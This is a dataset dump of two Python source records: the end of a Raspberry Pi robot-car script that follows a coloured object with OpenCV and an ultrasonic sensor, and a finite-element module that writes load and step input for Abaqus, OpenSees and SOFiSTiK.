fl_ahead(speed)\r\n fr_ahead(speed)\r\n rl_ahead(speed)\r\n \r\ndef go_back(speed):\r\n rr_back(speed)\r\n rl_back(speed)\r\n fr_back(speed)\r\n fl_back(speed)\r\n\r\n#making right turn \r\ndef turn_right(speed):\r\n rr_back(speed)\r\n fr_back(speed)\r\n fl_ahead(speed)\r\n rl_ahead(speed)\r\n \r\n#make left turn\r\ndef turn_left(speed):\r\n fl_back(speed)\r\n rl_back(speed)\r\n fr_ahead(speed)\r\n rr_ahead(speed)\r\n\r\n# parallel left shift\r\ndef shift_left(speed):\r\n fl_back(speed)\r\n rr_back(speed)\r\n rl_ahead(speed)\r\n fr_ahead(speed)\r\n\r\n# parallel right shift\r\ndef shift_right(speed):\r\n fr_back(speed)\r\n fl_ahead(speed)\r\n rl_back(speed)\r\n rr_ahead(speed)\r\n\r\ndef upper_right(speed):\r\n fl_ahead(speed)\r\n rr_ahead(speed)\r\n\r\ndef lower_left(speed):\r\n rr_back(speed)\r\n fl_back(speed)\r\n \r\ndef upper_left(speed):\r\n fr_ahead(speed)\r\n rl_ahead(speed)\r\n\r\ndef lower_right(speed):\r\n fr_back(speed)\r\n rl_back(speed)\r\n\r\n#make both motor stop\r\ndef stop_car():\r\n GPIO.output(INR1,False)\r\n GPIO.output(INR2,False)\r\n GPIO.output(INR3,False)\r\n GPIO.output(INR4,False)\r\n GPIO.output(INL1,False)\r\n GPIO.output(INL2,False)\r\n GPIO.output(INL3,False)\r\n GPIO.output(INL4,False)\r\n\r\ndef callback(x):\r\n pass\r\n\r\ndef ultra():\r\n GPIO.output(TRIG, False)\r\n #print (\"Waiting For Sensor To Settle\")\r\n time.sleep(0.05)\r\n \r\n GPIO.output(TRIG, True)\r\n time.sleep(0.00001)\r\n GPIO.output(TRIG, False)\r\n \r\n while GPIO.input(ECHO)==0:\r\n pulse_start = time.time()\r\n \r\n while GPIO.input(ECHO)==1:\r\n pulse_end = time.time()\r\n \r\n pulse_duration = pulse_end - pulse_start\r\n \r\n distance = pulse_duration * 17150\r\n \r\n distance = round(distance, 2)\r\n \r\n # print (\"Distance: \",distance,\"cm\")\r\n return distance\r\n\r\n\r\n# go_ahead(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# go_back(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# turn_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# turn_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# shift_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# shift_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# upper_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# lower_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# upper_right(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# lower_left(100)\r\n# time.sleep(1)\r\n# stop_car()\r\n# \r\n# GPIO.cleanup() \r\ncap = cv2.VideoCapture(0)#0-laptop webcam , 1-additional webcam\r\ncap.set(3,480)\r\ncap.set(4,320)\r\n\r\n_,frame=cap.read()\r\n\r\nrows,cols,_=frame.shape\r\nx_middle=int(cols/2)\r\ny_middle=int(rows/2)\r\n\r\n#display text\r\nx_center=x_middle\r\ny_center=y_middle\r\norg=(50, 50)\r\nfont=cv2.FONT_HERSHEY_SIMPLEX\r\nfontScale = 1\r\ncolor =(0,255,255)\r\nthickness=2\r\n\r\narea = 450.0\r\ncv2.namedWindow('HSV_TRACKBAR')\r\n\r\n#redcolor\r\nilowH = 51\r\nihighH = 81\r\n\r\nilowS = 31\r\nihighS = 255\r\nilowV = 117\r\nihighV = 255\r\n\r\n# create trackbars for color change\r\ncv2.createTrackbar('lowH','HSV_TRACKBAR',ilowH,179,callback)\r\ncv2.createTrackbar('highH','HSV_TRACKBAR',ihighH,179,callback)\r\n\r\ncv2.createTrackbar('lowS','HSV_TRACKBAR',ilowS,255,callback)\r\ncv2.createTrackbar('highS','HSV_TRACKBAR',ihighS,255,callback)\r\n\r\ncv2.createTrackbar('lowV','HSV_TRACKBAR',ilowV,255,callback)\r\ncv2.createTrackbar('highV','HSV_TRACKBAR',ihighV,255,callback)\r\n\r\nwhile True:\r\n \r\n ut=ultra()\r\n print(\"distance\",ut)\r\n _, frame = cap.read()\r\n \r\n hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n \r\n hL = cv2.getTrackbarPos('lowH','HSV_TRACKBAR')\r\n hH = cv2.getTrackbarPos('highH','HSV_TRACKBAR')\r\n sL = cv2.getTrackbarPos('lowS','HSV_TRACKBAR')\r\n sH = cv2.getTrackbarPos('highS','HSV_TRACKBAR')\r\n vL = cv2.getTrackbarPos('lowV','HSV_TRACKBAR')\r\n vH = cv2.getTrackbarPos('highV','HSV_TRACKBAR')\r\n \r\n #red color\r\n #low_red = np.array([0, 140, 136])\r\n #high_red = np.array([9,255,255])\r\n \r\n #green Color\r\n #low_green = np.array([51, 31, 117])\r\n #high_green = np.array([81,255,255])\r\n \r\n lower_hsv = np.array([hL,sL,vL],np.uint8)\r\n higher_hsv = np.array([hH,sH,vH],np.uint8)\r\n \r\n mask = cv2.inRange(hsv_frame, lower_hsv, higher_hsv)\r\n \r\n kernel= np.ones((5,5),np.uint8)\r\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\r\n mask=opening\r\n \r\n #For openCV version 2 or 4 \r\n if cv2.getVersionMajor() in [2, 4]:\r\n contours,_ = cv2.findContours(mask,cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours= sorted(contours, key=lambda x:cv2.contourArea(x) , reverse=True)\r\n else:\r\n #For OpenCV 3 \r\n _,contours,_ = cv2.findContours(mask,cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours= sorted(contours, key=lambda x:cv2.contourArea(x) , reverse=True)\r\n \r\n for cnt in contours: \r\n (x,y,w,h) = cv2.boundingRect(cnt)\r\n area = cv2.contourArea(cnt)\r\n print(area)\r\n if area>450: #20000 to stop\r\n x_middle = int((x+x+w)/2)\r\n y_middle = int((y+y+h)/2) \r\n cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255,0), 2)\r\n break\r\n else:\r\n x_middle = x_center\r\n y_middle = y_center\r\n stop_car()\r\n \r\n cv2.line( frame, (x_middle,0), (x_middle,rows), (0,0,255),1)\r\n cv2.line( frame, (0,y_middle), (cols,y_middle), (0,0,255),1)\r\n \r\n if (ut > 20 and ut <300) and area<38000 and area>450:\r\n if x_middle < x_center-45:\r\n frame=cv2.putText( frame, \"Move Left\",org,font,fontScale,color,thickness,cv2.LINE_AA)\r\n time.sleep(0.09)\r\n shift_left(100)\r\n time.sleep(0.02)\r\n stop_car()\r\n elif x_middle>x_center+45 :\r\n frame=cv2.putText( frame, \"Move Right\",org,font,fontScale,color,thickness, cv2.LINE_AA)\r\n time.sleep(0.09)\r\n shift_right(100)\r\n time.sleep(0.02)\r\n stop_car()\r\n elif x_middle>=x_center-45 or x_middle<=x_center+45 :\r\n frame=cv2.putText( frame, \"Move Forward\",org,font,fontScale,color,thickness, cv2.LINE_AA)\r\n time.sleep(0.09)\r\n go_ahead(100)\r\n time.sleep(0.08)\r\n stop_car()\r\n elif ut<=20 or area>=38000:\r\n frame=cv2.putText( frame, \"STOP!!!\",org,font,fontScale,(0,0,255),thickness, cv2.LINE_AA) \r\n stop_car()\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n cv2.imshow(\"mask\", mask)\r\n \r\n \r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()\r\nGPIO.cleanup()\r\n","sub_path":"Integrated_final_Code.py","file_name":"Integrated_final_Code.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"188480972","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport json\n\n\n__author__ = ['Andrew Liew ']\n__copyright__ = 'Copyright 2018, BLOCK Research Group - ETH Zurich'\n__license__ = 'MIT License'\n__email__ = 'liew@arch.ethz.ch'\n\n\n__all__ = [\n 'write_input_steps',\n]\n\n\ncomments = {\n 'abaqus': '**',\n 'opensees': '#',\n 'sofistik': '$',\n 'ansys': '!',\n}\n\nmiddle = {\n 'abaqus': '',\n 'opensees': '}\\n',\n 'sofistik': '',\n 'ansys': '',\n}\n\nheaders = {\n 'abaqus': '',\n 'opensees': '',\n 'sofistik': '+PROG ASE\\n$\\n',\n 'ansys': '',\n}\n\nfooters = {\n 'abaqus': '',\n 'opensees': '',\n 'sofistik': 'END\\n$\\n$\\n',\n 'ansys': '',\n}\n\ndofs = ['x', 'y', 'z', 'xx', 'yy', 'zz']\nnode_fields = ['rf', 'rm', 'u', 'ur', 'cf', 'cm']\nelement_fields = ['sf', 'sm', 'sk', 'se', 's', 'e', 'pe', 'rbfor', 'ctf']\n\n\ndef _write_point_loads(f, software, com, factor):\n\n if software == 'abaqus':\n\n f.write('*CLOAD\\n')\n f.write('**\\n')\n\n for node, coms in com.items():\n ni = node + 1\n for ci, value in coms.items():\n index = dofs.index(ci) + 1\n f.write('{0}, {1}, {2}'.format(ni, index, value * factor) + '\\n')\n\n elif software == 'sofistik':\n\n for node, coms in com.items():\n ni = node + 1\n for ci, value in coms.items():\n if ci in 'xyz':\n f.write(' NODE NO {0} TYPE P{1}{1} {2}[kN]\\n'.format(ni, ci.upper(), value * 0.001))\n else:\n f.write(' NODE NO {0} TYPE M{1} {2}[kNm]\\n'.format(ni, ci.upper(), value * 0.001))\n\n elif software == 'opensees':\n\n pass\n elif software == 'ansys':\n\n pass\n\n\ndef _write_point_load(f, software, com, nodes, ndof, sets, factor):\n\n if software == 'abaqus':\n\n f.write('*CLOAD\\n')\n f.write('**\\n')\n for node in nodes:\n if isinstance(node, str):\n ni = node\n else:\n ni = node + 1\n for ci, dof in enumerate(dofs, 1):\n if com[dof]:\n f.write('{0}, {1}, {2}'.format(ni, ci, com[dof] * factor) + '\\n')\n f.write('**\\n')\n\n elif software == 'sofistik':\n\n for node in nodes:\n if isinstance(node, str):\n selection = sets[node]['selection']\n for i in selection:\n ni = i + 1\n for ci, value in com.items():\n if value:\n if ci in 'xyz':\n f.write(' NODE NO {0} TYPE P{1}{1} {2}\\n'.format(ni, ci.upper(), value * 0.001))\n else:\n f.write(' NODE NO {0} TYPE M{1} {2}\\n'.format(ni, ci.upper(), value * 0.001))\n else:\n pass\n\n elif software == 'opensees':\n\n coms = ' '.join([str(com[dof]) for dof in dofs[:ndof]])\n for node in nodes:\n if isinstance(node, str):\n selection = sets[node]['selection']\n for i in selection:\n ni = i + 1\n f.write('load {0} {1}\\n'.format(ni, coms))\n else:\n ni = node + 1\n f.write('load {0} {1}\\n'.format(ni, coms))\n f.write('#\\n')\n\n elif software == 'opensees':\n\n pass\n\n\ndef _write_line_load(f, software, axes, com, factor, elset, sets, structure):\n\n for k in elset:\n\n if software == 'abaqus':\n\n f.write('*DLOAD\\n')\n f.write('**\\n')\n\n if axes == 'global':\n for dof in dofs[:3]:\n if com[dof]:\n f.write('{0}, P{1}, {2}'.format(k, dof.upper(), factor * com[dof]) + '\\n')\n\n elif axes == 'local':\n if com['x']:\n f.write('{0}, P1, {1}'.format(k, factor * com['x']) + '\\n')\n if com['y']:\n f.write('{0}, P2, {1}'.format(k, factor * com['y']) + '\\n')\n\n elif software == 'opensees':\n\n if axes == 'global':\n raise NotImplementedError\n\n elif axes == 'local':\n elements = ' '.join([str(i + 1) for i in sets[k]['selection']])\n f.write('eleLoad -ele {0} -type -beamUniform {1} {2}\\n'.format(elements, -com['y'], -com['x']))\n\n elif software == 'sofistik':\n\n for i in sets[k]['selection']:\n ni = structure.sofistik_mapping[i]\n if axes == 'global':\n if com['x']:\n f.write(' BEAM {0} TYPE PXX {1}[kN/m]\\n'.format(ni, com['x'] * 0.001))\n if com['y']:\n f.write(' BEAM {0} TYPE PYY {1}[kN/m]\\n'.format(ni, com['y'] * 0.001))\n if com['z']:\n f.write(' BEAM {0} TYPE PZZ {1}[kN/m]\\n'.format(ni, com['z'] * 0.001))\n elif axes == 'local':\n if com['z']:\n f.write(' BEAM {0} TYPE PX {1}[kN/m]\\n'.format(ni, com['z'] * 0.001))\n if com['x']:\n f.write(' BEAM {0} TYPE PY {1}[kN/m]\\n'.format(ni, com['x'] * 0.001))\n if com['y']:\n f.write(' BEAM {0} TYPE PZ {1}[kN/m]\\n'.format(ni, com['y'] * 0.001))\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_area_load(f, software, com, axes, elset, sets, factor):\n\n if software == 'opensees':\n\n pass\n\n elif software == 'abaqus':\n\n if axes == 'global':\n raise NotImplementedError\n\n elif axes == 'local':\n # x COMPONENT\n # y COMPONENT\n f.write('*DLOAD\\n')\n f.write('**\\n')\n if com['z']:\n f.write('{0}, P, {1}'.format(elset, factor * com['z']) + '\\n')\n\n elif software == 'sofistik':\n\n components = ''\n for i in 'xyz':\n if com[i]:\n if axes == 'local':\n components += ' P{0} {1}[kN/m2]'.format(i.upper(), 0.001 * com[i])\n elif axes == 'global':\n components += ' P{0}{0} {1}[kN/m2]'.format(i.upper(), 0.001 * com[i])\n for k in elset:\n set_index = sets[k]['index'] + 1\n f.write(' QUAD GRP {0} TYPE{1}\\n'.format(set_index, components))\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_gravity_load(f, software, g, com, elset, factor):\n\n gx = com['x'] if com['x'] else 0\n gy = com['y'] if com['y'] else 0\n gz = com['z'] if com['z'] else 0\n\n if software == 'abaqus':\n\n for k in elset:\n f.write('*DLOAD\\n')\n f.write('**\\n')\n f.write('{0}, GRAV, {1}, {2}, {3}, {4}\\n'.format(k, g * factor, gx, gy, gz))\n f.write('**\\n')\n\n elif software == 'sofistik':\n\n pass\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_displacements(f, software, com, nset, factor, sets, ndof):\n\n if software == 'abaqus':\n\n f.write('*BOUNDARY\\n')\n f.write('**\\n')\n for ci, dof in enumerate(dofs, 1):\n if com[dof] is not None:\n f.write('{0}, {1}, {1}, {2}\\n'.format(nset, ci, com[dof] * factor))\n\n elif software == 'opensees':\n\n for ci, dof in enumerate(dofs[:ndof], 1):\n if com[dof] is not None:\n for node in sets[nset]['selection']:\n f.write('sp {0} {1} {2}\\n'.format(node + 1, ci, com[dof]))\n\n elif software == 'sofistik':\n\n for i in sets[nset]['selection']:\n ni = i + 1\n if com['x'] is not None:\n f.write(' NODE {0} TYPE WXX {1}[mm]\\n'.format(ni, com['x'] * 1000))\n if com['y'] is not None:\n f.write(' NODE {0} TYPE WYY {1}[mm]\\n'.format(ni, com['y'] * 1000))\n if com['z'] is not None:\n f.write(' NODE {0} TYPE WZZ {1}[mm]\\n'.format(ni, com['z'] * 1000))\n if com['xx'] is not None:\n f.write(' NODE {0} TYPE DXX {1}\\n'.format(ni, com['xx'] * 1000))\n if com['yy'] is not None:\n f.write(' NODE {0} TYPE DYY {1}\\n'.format(ni, com['yy'] * 1000))\n if com['zz'] is not None:\n f.write(' NODE {0} TYPE DZZ {1}\\n'.format(ni, com['zz'] * 1000))\n\n\ndef _write_tributary_load(f, software, com, factor):\n\n if software == 'abaqus':\n f.write('*CLOAD\\n')\n f.write('**\\n')\n\n for node in sorted(com, key=int):\n ni = node + 1\n\n if software == 'abaqus':\n\n for ci, dof in enumerate(dofs[:3], 1):\n if com[node][dof]:\n ni = node + 1\n dl = com[node][dof] * factor\n f.write('{0}, {1}, {2}\\n'.format(ni, ci, dl))\n\n elif software == 'sofistik':\n\n f.write(' NODE NO {0} TYPE '.format(ni))\n for ci, dof in enumerate(dofs[:3], 1):\n if com[node][dof]:\n dl = com[node][dof] / 1000.\n f.write('P{0}{0}[kN] {1}\\n'.format(dof.upper(), dl))\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_prestress_load(f, software, elset, com):\n\n for k in elset:\n\n if software == 'abaqus':\n\n f.write('*INITIAL CONDITIONS, TYPE=STRESS\\n')\n f.write('{0}, '.format(k))\n if com['sxx']:\n f.write('{0}\\n'.format(com['sxx']))\n\n elif software == 'sofistik':\n\n pass\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef _write_thermal_load(f, software, elset, temperature, sets, factor):\n\n for k in elset:\n\n if software == 'abaqus':\n\n pass\n\n elif software == 'sofistik':\n\n for k in elset:\n set_index = sets[k]['index'] + 1\n f.write(' QUAD GRP {0} TYPE {1} {2}\\n'.format(set_index, 'DTXY', temperature))\n\n elif software == 'opensees':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n\ndef write_input_steps(f, software, structure, steps, loads, displacements, sets, fields, ndof=6, properties={}):\n\n \"\"\" Writes the Steps information to the input file.\n\n Parameters\n ----------\n f : obj\n The open file object for the .tcl file.\n software : str\n Analysis software or library to use, 'abaqus', 'opensees', 'sofistik' or 'ansys'.\n structure : obj\n The Structure object to read from.\n steps : dic\n Step objects from structure.steps.\n loads : dic\n Load objects from structure.loads.\n displacements : dic\n Displacement objects from structure.displacements.\n sets : dic\n Sets from structures.sets.\n fields : list\n Requested fields output.\n ndof : int\n Number of degrees-of-freedom per node.\n properties : dic\n ElementProperties objects from structure.element_properties\n\n Returns\n -------\n None\n\n \"\"\"\n\n c = comments[software]\n\n if software == 'sofistik':\n\n f.write('{0} -----------------------------------------------------------------------------\\n'.format(c))\n f.write('{0} ----------------------------------------------------------------------- Loads\\n'.format(c))\n f.write('$\\n')\n f.write('+PROG SOFILOAD\\n')\n\n for k in sorted(loads):\n\n load = loads[k]\n load_index = load.index + 1\n ltype = load.__name__\n com = getattr(load, 'components', None)\n axes = getattr(load, 'axes', None)\n temperature = getattr(load, 'temperature', None)\n nodes = getattr(load, 'nodes', None)\n elset = getattr(load, 'elements', None)\n\n if isinstance(nodes, str):\n nodes = [nodes]\n\n if isinstance(elset, str):\n elset = [elset]\n\n if ltype != 'GravityLoad':\n\n f.write('$\\n')\n f.write('$ {0}\\n'.format(k))\n f.write('$ ' + '-' * len(k) + '\\n')\n f.write('$\\n')\n f.write(\"LC {0} TITL '{1}'\\n\".format(load_index, k))\n\n if ltype == 'PointLoad':\n _write_point_load(f, software, com, nodes, ndof, sets, 1)\n\n elif ltype == 'PointLoads':\n _write_point_loads(f, software, com, 1)\n\n elif ltype == 'LineLoad':\n _write_line_load(f, software, axes, com, 1, elset, sets, structure)\n\n elif ltype == 'PrestressLoad':\n _write_prestress_load(f, software, elset, com)\n\n elif ltype == 'TributaryLoad':\n _write_tributary_load(f, software, com, 1)\n\n elif ltype == 'AreaLoad':\n _write_area_load(f, software, com, axes, elset, sets, 1)\n\n elif ltype == 'ThermalLoad':\n _write_thermal_load(f, software, elset, temperature, sets, 1)\n\n f.write('$\\n')\n\n for k in sorted(displacements):\n\n bc_disps = steps[structure.steps_order[0]].displacements\n if isinstance(bc_disps, str):\n bc_disps = [bc_disps]\n\n if k not in bc_disps:\n\n displacement = displacements[k]\n displacement_index = displacement.index + 1 + len(structure.loads)\n com = displacement.components\n nset = displacement.nodes\n\n f.write('{0} {1}\\n'.format(c, k))\n f.write('{0} '.format(c) + '-' * len(k) + '\\n')\n f.write('$\\n')\n f.write(\"LC {0} TITL '{1}'\\n\".format(displacement_index, k))\n\n _write_displacements(f, software, com, nset, 1, sets, ndof)\n\n f.write('$\\n')\n f.write('END\\n')\n f.write('$\\n')\n f.write('$\\n')\n\n f.write('{0} -----------------------------------------------------------------------------\\n'.format(c))\n f.write('{0} ----------------------------------------------------------------------- Steps\\n'.format(c))\n f.write('{0}\\n'.format(c))\n\n keys = list(structure.steps_order[1:])\n\n temp = '{0}{1}/'.format(structure.path, structure.name)\n try:\n os.stat(temp)\n except:\n os.mkdir(temp)\n\n for key in keys:\n\n step = steps[key]\n stype = step.__name__\n step_index = step.index\n state = getattr(step, 'state', None)\n factor = getattr(step, 'factor', 1)\n increments = getattr(step, 'increments', None)\n tolerance = getattr(step, 'tolerance', None)\n iterations = getattr(step, 'iterations', None)\n method = getattr(step, 'type', None)\n nlgeom = 'YES' if getattr(step, 'nlgeom', None) else 'NO'\n nlmat = 'YES' if getattr(step, 'nlmat', None) else 'NO'\n\n if isinstance(step.loads, str):\n step.loads = [step.loads]\n\n # Mechanical\n\n if stype in ['GeneralStep', 'BucklingStep']:\n\n if headers[software]:\n f.write(headers[software])\n\n f.write('{0} {1}\\n'.format(c, key))\n f.write('{0} '.format(c) + '-' * len(key) + '\\n')\n f.write('{0}\\n'.format(c))\n\n if software == 'abaqus':\n\n perturbation = ', PERTURBATION' if stype == 'BucklingStep' else ''\n f.write('*STEP, NLGEOM={0}, NAME={1}{2}, INC={3}\\n'.format(nlgeom, key, perturbation, increments))\n f.write('*{0}\\n'.format(method.upper()))\n # f.write(', {0}\\n'.format(factor))\n f.write('**\\n')\n\n if stype == 'BucklingStep':\n modes = step.modes\n f.write('{0}, {1}, {2}, {3}\\n'.format(modes, modes, 2 * modes, increments))\n\n f.write('**\\n')\n\n elif software == 'opensees':\n\n f.write('timeSeries Constant {0} -factor 1.0\\n'.format(step_index))\n f.write('pattern Plain {0} {0} -fact {1} {2}\\n'.format(step_index, factor, '{'))\n f.write('#\\n')\n\n elif software == 'sofistik':\n\n f.write(\"LC 1{0:0>2}0 TITL '{1}' DLZ 0.0\\n\".format(step_index, key))\n\n # Loads\n\n for k in step.loads:\n\n load = loads[k]\n load_index = load.index + 1\n ltype = load.__name__\n com = getattr(load, 'components', None)\n axes = getattr(load, 'axes', None)\n nodes = getattr(load, 'nodes', None)\n\n if isinstance(factor, dict):\n fact = factor.get(k, 1.0)\n else:\n fact = factor\n\n if isinstance(nodes, str):\n nodes = [nodes]\n\n if isinstance(load.elements, str):\n elset = [load.elements]\n else:\n elset = load.elements\n\n if software != 'sofistik':\n f.write('{0} {1}\\n'.format(c, k))\n f.write('{0} '.format(c) + '-' * len(k) + '\\n')\n f.write('{0}\\n'.format(c))\n else:\n if ltype != 'GravityLoad':\n f.write(' LCC {0} FACT {1} $ {2}\\n'.format(load_index, fact, k))\n\n # Point load\n\n if ltype == 'PointLoad':\n if software != 'sofistik':\n _write_point_load(f, software, com, nodes, ndof, sets, fact)\n\n # Point loads\n\n elif ltype == 'PointLoads':\n if software != 'sofistik':\n _write_point_loads(f, software, com, fact)\n\n # # Pre-stress\n\n elif ltype in ['PrestressLoad']:\n if software != 'sofistik':\n _write_prestress_load(f, software, elset, com)\n\n # Line load\n\n elif ltype == 'LineLoad':\n if software != 'sofistik':\n _write_line_load(f, software, axes, com, fact, elset, sets, structure)\n\n # Area load\n\n elif ltype == 'AreaLoad':\n if software != 'sofistik':\n _write_area_load(f, software, com, axes, elset, sets, fact)\n\n # Body load\n\n elif ltype == 'BodyLoad':\n\n raise NotImplementedError\n\n # Gravity load\n\n elif ltype == 'GravityLoad':\n if software != 'sofistik':\n _write_gravity_load(f, software, load.g, com, elset, fact)\n\n # Tributary load\n\n elif ltype == 'TributaryLoad':\n if software != 'sofistik':\n _write_tributary_load(f, software, com, fact)\n\n # Displacements\n\n for k in step.displacements:\n\n if isinstance(factor, dict):\n fact = factor.get(k, 1.0)\n else:\n fact = factor\n\n displacement = displacements[k]\n displacement_index = displacement.index + 1 + len(structure.loads)\n com = displacement.components\n nset = displacement.nodes\n\n if software != 'sofistik':\n f.write('{0} {1}\\n'.format(c, k))\n f.write('{0} '.format(c) + '-' * len(k) + '\\n')\n f.write('{0}\\n'.format(c))\n _write_displacements(f, software, com, nset, fact, sets, ndof)\n\n else:\n f.write(' LCC {0} $ {1}\\n'.format(displacement_index, k))\n\n # Output\n\n if middle[software]:\n f.write(middle[software])\n\n if software == 'opensees':\n\n nodal = {}\n node_range = '1 {0}'.format(structure.node_count())\n\n if 'u' in fields:\n nodal['node_u.out'] = '1 2 3 disp'\n if 'rf' in fields:\n nodal['node_rf.out'] = '1 2 3 reaction'\n if ndof == 6:\n if 'ur' in fields:\n nodal['node_ur.out'] = '4 5 6 disp'\n if 'rm' in fields:\n nodal['node_rm.out'] = '4 5 6 reaction'\n\n prefix = 'recorder Node -file {0}{1}_'.format(temp, key)\n for k, j in nodal.items():\n f.write('{0}{1} -time -nodeRange {2} -dof {3}\\n'.format(prefix, k, node_range, j))\n\n truss_elements = ''\n beam_elements = ''\n spring_elements = ''\n truss_numbers = []\n beam_numbers = []\n spring_numbers = []\n\n for ekey, element in structure.elements.items():\n etype = element.__name__\n\n if etype in ['TrussElement', 'StrutElement', 'TieElement']:\n truss_elements += '{0} '.format(ekey + 1)\n truss_numbers.append(ekey)\n\n elif etype in ['BeamElement']:\n beam_elements += '{0} '.format(ekey + 1)\n beam_numbers.append(ekey)\n\n elif etype in ['SpringElement']:\n spring_elements += '{0} '.format(ekey + 1)\n spring_numbers.append(ekey)\n\n prefix = 'recorder Element -file {0}{1}_'.format(temp, key)\n\n if 'sf' in fields:\n\n if truss_elements:\n k = 'element_truss_sf.out'\n j = 'axialForce'\n f.write('{0}{1} -time -ele {2}{3}\\n'.format(prefix, k, truss_elements, j))\n\n if beam_elements:\n k = 'element_beam_sf.out'\n j = 'force'\n f.write('{0}{1} -time -ele {2}{3}\\n'.format(prefix, k, beam_elements, j))\n\n if 'spf' in fields:\n\n if spring_elements:\n k = 'element_spring_sf.out'\n j = 'basicForces'\n f.write('{0}{1} -time -ele {2}{3}\\n'.format(prefix, k, spring_elements, j))\n\n with open('{0}truss_numbers.json'.format(temp), 'w') as fo:\n json.dump({'truss_numbers': truss_numbers}, fo)\n\n with open('{0}beam_numbers.json'.format(temp), 'w') as fo:\n json.dump({'beam_numbers': beam_numbers}, fo)\n\n with open('{0}spring_numbers.json'.format(temp), 'w') as fo:\n json.dump({'spring_numbers': spring_numbers}, fo)\n\n f.write('#\\n')\n # f.write('constraints Plain\\n')\n f.write('constraints Transformation\\n')\n f.write('numberer RCM\\n')\n f.write('system ProfileSPD\\n')\n f.write('test NormUnbalance {0} {1} 5\\n'.format(tolerance, iterations))\n f.write('algorithm NewtonLineSearch\\n')\n f.write('integrator LoadControl {0}\\n'.format(1./increments))\n f.write('analysis Static\\n')\n f.write('analyze {0}\\n'.format(increments))\n\n elif software == 'abaqus':\n\n if isinstance(fields, list):\n fields = structure.fields_dic_from_list(fields)\n if 'spf' in fields:\n fields['ctf'] = 'all'\n del fields['spf']\n\n f.write('**\\n')\n f.write('*OUTPUT, FIELD\\n')\n f.write('**\\n')\n f.write('*NODE OUTPUT\\n')\n f.write('**\\n')\n f.write(', '.join([i.upper() for i in node_fields if i in fields]) + '\\n')\n f.write('**\\n')\n f.write('*ELEMENT OUTPUT\\n')\n f.write('**\\n')\n f.write(', '.join([i.upper() for i in element_fields if (i in fields and i != 'rbfor')]) + '\\n')\n if 'rbfor' in fields:\n f.write('*ELEMENT OUTPUT, REBAR\\n')\n f.write('RBFOR\\n')\n f.write('**\\n')\n f.write('*END STEP\\n')\n\n elif software == 'sofistik':\n\n pass\n\n elif software == 'ansys':\n\n pass\n\n f.write('{0}\\n'.format(c))\n f.write('{0}\\n'.format(c))\n\n if footers[software]:\n f.write(footers[software])\n\n if software == 'sofistik':\n\n is_rebar = False\n for property in properties.values():\n if property.reinforcement:\n is_rebar = True\n\n if is_rebar:\n\n f.write('+PROG BEMESS\\n')\n f.write(\"HEAD REBAR {0} LC 1{1:0>2}0\\n\".format(state.upper(), step_index))\n f.write('$\\n')\n f.write('CTRL WARN 471 $ Element thickness too thin and not allowed for a design.\\n')\n # f.write('CTRL WARN 496 $ Possible non-constant longitudinal reinforcement.\\n')\n # f.write('CTRL WARN 254 $ Vertical shear reinforcement not allowed for slab thickness smaller 20 cm.\\n')\n f.write('CTRL PFAI 2\\n')\n if state == 'sls':\n # f.write('CTRL SERV GALF 1.45\\n')\n f.write('CTRL SLS\\n')\n f.write('CRAC WK PARA\\n')\n else:\n f.write('CTRL ULTI\\n')\n f.write('CTRL LCR {0}\\n'.format(step_index))\n f.write('LC 1{0:0>2}0\\n'.format(step_index)) # can put many LC here LC301,302 etc\n f.write('$\\n')\n f.write('$\\n')\n f.write('END\\n')\n f.write('$\\n')\n f.write('$\\n')\n\n # if state == 'uls':\n\n # f.write('+PROG BEMESS\\n')\n # f.write(\"HEAD REBAR {0} LC 1{1:0>2}0 COMBINED\\n\".format(state.upper(), step_index))\n # f.write('$\\n')\n # f.write('CTRL WARN 471 $ Element thickness too thin and not allowed for a design.\\n')\n # f.write('CTRL PFAI 2\\n')\n # f.write('CTRL LCRI {0}\\n'.format(step_index))\n # f.write('CTRL LCR 1{0:0>2}\\n'.format(step_index))\n # f.write('$\\n')\n # f.write('$\\n')\n # f.write('END\\n')\n # f.write('$\\n')\n # f.write('$\\n')\n\n f.write('+PROG ASE\\n')\n f.write(\"HEAD SOLVE {0} LC 2{1:0>2}0 {2}\\n\".format(state.upper(), step_index, key))\n f.write('$\\n')\n f.write('CTRL SOLV 1\\n')\n f.write('CTRL CONC\\n')\n\n if state == 'sls':\n f.write('NSTR KMOD S1 KSV SLD\\n')\n elif state == 'uls':\n f.write('NSTR KMOD S1 KSV ULD\\n')\n if nlgeom == 'YES':\n f.write('SYST PROB TH3 ITER {0} TOL {1} NMAT {2}\\n'.format(increments, tolerance, nlmat))\n\n # if state == 'uls':\n # f.write('REIQ LCR 1{0:0>2}\\n'.format(step_index))\n # else:\n # f.write('REIQ LCR {0}\\n'.format(step_index))\n\n f.write('REIQ LCR {0}\\n'.format(step_index))\n 